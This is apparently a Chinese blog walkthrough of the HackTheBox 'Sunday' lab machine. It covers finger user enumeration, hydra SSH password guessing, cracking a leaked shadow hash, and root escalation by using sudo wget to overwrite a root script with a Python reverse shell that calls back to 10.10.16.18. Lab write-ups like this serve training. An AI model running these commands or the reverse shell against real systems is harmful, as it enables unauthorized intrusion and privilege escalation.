[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提升

信息收集

IP Address Opening Ports
10.10.10.76 TCP:79, 111, 515, 6787, 22022

$ nmap -p- 10.10.10.76 --min-rate 1000 -sC -sV

bash 复制代码
PORT      STATE SERVICE VERSION
79/tcp    open  finger?
| fingerprint-strings:
|   GenericLines:
|     No one logged on
|   GetRequest:
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions:
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help:
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest:
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie:
|_    Login Name TTY Idle When Where
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
515/tcp   open  printer
6787/tcp  open  http    Apache httpd
|_http-title: 400 Bad Request
|_http-server-header: Apache
22022/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)

Finger

$ wget http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz

$ tar -zxvf finger-user-enum-1.0.tar.gz

$ cd finger-user-enum-1.0

$ ./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

$ hydra -L user.txt -p 'sunday' ssh://10.10.1

username:sunny password:sunday

sunny 横向 sammy

$ ssh -p 22022 sunny@10.10.10.76

sunny@sunday:~$ cat /backup/shadow.backup

$ echo '$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB'>hash

$ hashcat -m 7400 hash /usr/share/wordlists/rockyou.txt --force

username:sammy password:cooldude!

User.txt

be9b6b0e94d29be3bfc0373008b2b38a

权限提升

$ ssh -p 22022 sammy@10.10.10.76

$ sudo /usr/bin/wget http://10.10.16.18/reverse.py -O /root/troll

python 复制代码
#!/usr/bin/python

import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.18",10032))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

$ sudo /root/troll

脚本将每五秒自动恢复/root/troll初始状态,所以需要快速输入

Root.txt

59b946dc21f12651e440bbfd962cbff0

相关推荐
ysa0510305 小时前
【板子】Dinic(最大网络流)
网络
我星期八休息5 小时前
网络编程—应用层HTTP协议
linux·运维·开发语言·前端·网络·网络协议·http
ITxiaobing20236 小时前
IP库与AppsFlyer数据对账指南:破解国家/地区数据不一致的难题
网络·网络协议
有浔则灵7 小时前
GORM钩子函数详解
网络·安全·web安全
汇智信科8 小时前
图谱、向量、关键词、SQL多路一体,FastKG垂域召回率100%拉满
网络·数据库·ai编程·汇智信科·hsim·fastclaw·汇智龙虾
liulilittle8 小时前
论分布式系统的半开闭问题
服务器·网络·分布式·系统架构·竞态
FreeBuf_8 小时前
仅用六分钟,黑客借助Gemini CLI自主构建并迁移C&C僵尸网络
网络·人工智能
cyforkk8 小时前
Vercel 绑定自定义域名极简配置指南
服务器·前端·网络
Yang961110 小时前
探索无线新视界:鼎讯信通DXMP系列频谱仪模块深度剖析
运维·网络
进阶的猪11 小时前
【无标题】vmware虚拟机无法勾选**将主机虚拟适配器连接到此网络** /没有网络(不显示网络图标)的解决方法
网络